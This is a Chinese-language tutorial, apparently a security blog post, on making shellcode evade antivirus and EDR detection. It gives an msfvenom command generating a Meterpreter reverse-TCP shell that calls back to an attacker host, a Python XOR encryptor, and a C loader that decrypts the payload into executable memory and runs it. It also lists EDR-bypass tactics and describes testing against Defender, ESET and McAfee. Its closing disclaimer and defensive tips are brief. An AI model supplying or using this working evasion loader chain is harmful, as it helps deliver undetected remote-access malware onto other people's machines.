一、为什么Shellcode需要加密?
攻击者在渗透测试中频繁使用Shellcode,它可以理解为一段直接在目标机器上执行的机器指令,用来完成具体的攻击任务,如打开反弹Shell、下载并执行恶意程序等。然而,随着防御技术的进步,各类杀软、EDR(Endpoint Detection and Response)系统对攻击载荷的检测能力越来越强。未加密的Shellcode很容易被特征匹配、静态分析、行为检测等技术捕获和拦截。
为了避开这些检测机制,攻击者普遍会对Shellcode进行加密处理,在运行时动态解密再执行。加密的目的是隐藏攻击载荷的真实意图和内容,而解密执行则需要一定的技巧,既要保证载荷的功能性,又要绕过常见的安全检测。
一个加密免杀的流程通常包括以下几个步骤:
- 编写或生成Shellcode。
- 使用对称加密、异或混淆等方式对Shellcode进行加密。
- 在目标机器上通过自定义解密器,为Shellcode动态解密。
- 将解密后的Shellcode注入到目标进程或内存中,完成恶意操作。
下面,我们将从实战的角度来构建一套完整的Shellcode加密免杀方案。
---
二、实战环境快速部署
在正式进入技术细节之前,搭建一个合适的测试环境是关键。我们需要以下组件:
攻击端环境
- Kali Linux:用于生成Shellcode和运行攻击脚本。
- 工具链:
- msfvenom(Metasploit的载荷生成器)
- Python3(用于加密和解密代码的开发)
- Mingw-w64(用于跨平台编译C代码)
- Obfuscation工具(如PyInstaller或UPX,加壳用)
靶机环境
- Windows 10 x64:用于模拟目标系统。
- 防护软件:安装常见杀软如Windows Defender、ESET、McAfee,用于测试免杀效果。
- 调试工具:
- x64dbg(动态调试Shellcode解密执行过程)
- Process Hacker(观察内存注入行为)
环境搭建步骤
- 在Kali中用
msfvenom生成一个Windows平台的反弹Shell Payload:
<pre><code class="language-bash"> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shellcode.raw ` 这里生成的原始Shellcode保存为shellcode.raw,稍后会用Python加密处理。
- 在Windows 10虚拟机中确认目标IP地址和开放端口,关闭杀软进行初步测试。之后逐步开启防护软件,观察免杀效果。
- 准备好Python和C语言的开发环境,安装必要的库和工具即可开始实战。
---
三、Payload构造的艺术
为了实现Shellcode的加密解密,我们采用了以下思路:
1. 使用XOR加密隐藏原始Shellcode
XOR(异或运算)是一种简单高效的加密方法,通过一个密钥对Shellcode逐字节加密。只有知道密钥的人才能解密并恢复原始代码。
以下是一个简单的Python脚本,用于加密Shellcode: </code></pre>python
xor_encrypt.py
import sys
def xor_encrypt(data, key): encrypted = bytearray() for byte in data: encrypted.append(byte ^ key) # 每个字节和密钥做异或 return encrypted
if __name__ == "__main__": if len(sys.argv) != 3: print("用法: python xor_encrypt.py <shellcode_file> <key>") sys.exit(1)
shellcode_file = sys.argv[1] key = int(sys.argv[2]) # 加密密钥 (0-255)
with open(shellcode_file, "rb") as f: shellcode = f.read()
encrypted_shellcode = xor_encrypt(shellcode, key)
with open("encrypted_shellcode.bin", "wb") as f: f.write(encrypted_shellcode)
print(f"[+] 加密完成!输出保存到 encrypted_shellcode.bin") <pre><code> 使用方法:</code></pre>bash python xor_encrypt.py shellcode.raw 123 <pre><code>这将用密钥123对原始Shellcode进行加密,加密后的文件为encrypted_shellcode.bin。
2. C语言实现解密器
在目标机器上,我们需要一个解密器来动态解密并运行加密的Shellcode。以下是用C语言实现的解密和执行代码: </code></pre>c
include <windows.h>
include <stdio.h>
// 解密函数 void xor_decrypt(unsigned char *data, int len, unsigned char key) { for (int i = 0; i < len; i++) { data[i] ^= key; // 与密钥执行异或还原 } }
int main() { // 加密后的Shellcode unsigned char encrypted_shellcode[] = { / 放入加密后的Shellcode / };
// Shellcode长度 int encrypted_len = sizeof(encrypted_shellcode);
// 解密密钥 unsigned char key = 123;
// 动态分配内存 unsigned char decrypted_shellcode = (unsigned char )VirtualAlloc( NULL, encrypted_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!decrypted_shellcode) { printf("[-] 内存分配失败!\n"); return -1; }
// 解密Shellcode memcpy(decrypted_shellcode, encrypted_shellcode, encrypted_len); xor_decrypt(decrypted_shellcode, encrypted_len, key);
// 执行Shellcode ((void(*)())decrypted_shellcode)();
return 0; } <pre><code> 将上述代码保存为loader.c,用Mingw-w64进行编译:</code></pre>bash x86_64-w64-mingw32-gcc loader.c -o loader.exe `
此程序会在运行时解密Shellcode并直接执行。
---
四、EDR绕过的套路详解
即使加密了Shellcode,许多EDR产品仍能够通过行为分析检测其解密和执行。以下是一些有效的对抗措施:
1. 使用分段解密
不要一次性解密完整的Shellcode,而是分段解密并逐段执行。例如,解密64字节后立即执行,再解密下一段。这种方法可以有效躲避内存扫描。
2. 动态加载关键函数
通过LoadLibraryA和GetProcAddress动态加载API函数,避免直接使用WinAPI调用的特征。
3. Shellcode的多层加密
在XOR加密的基础上,增加Base64或AES加密层,使解密过程更复杂。
---
五、免杀效果测试
将编译好的loader.exe上传至Windows虚拟机,逐步开启杀软进行测试:
- 在关闭杀软的情况下,确认Shellcode成功执行。
- 激活Windows Defender,观察是否拦截。
- 打开第三方杀软ESET、McAfee,记录检测结果。
通过以上方法,我们可以逐步优化Payload,确保其免杀性。
---
六、个人心得与安全建议
Shellcode加密免杀是一门技术与艺术的结合。对于攻防双方,这都是一场持久战。作为研究者,我们应始终在合法授权的范围内测试自己的技术,同时不断学习新的检测和防御方法。切勿将此类技术用于非法用途,否则将面临严重的法律责任。
防御建议:
- 启用EDR和日志分析,关注行为异常而非单纯特征匹配。
- 使用内存保护技术,如DEP(数据执行保护)和ASLR(地址空间布局随机化)。
- 定期更新杀软特征库,避免落后于攻击技术。
最后一句话,技术无罪,但使用者有责!
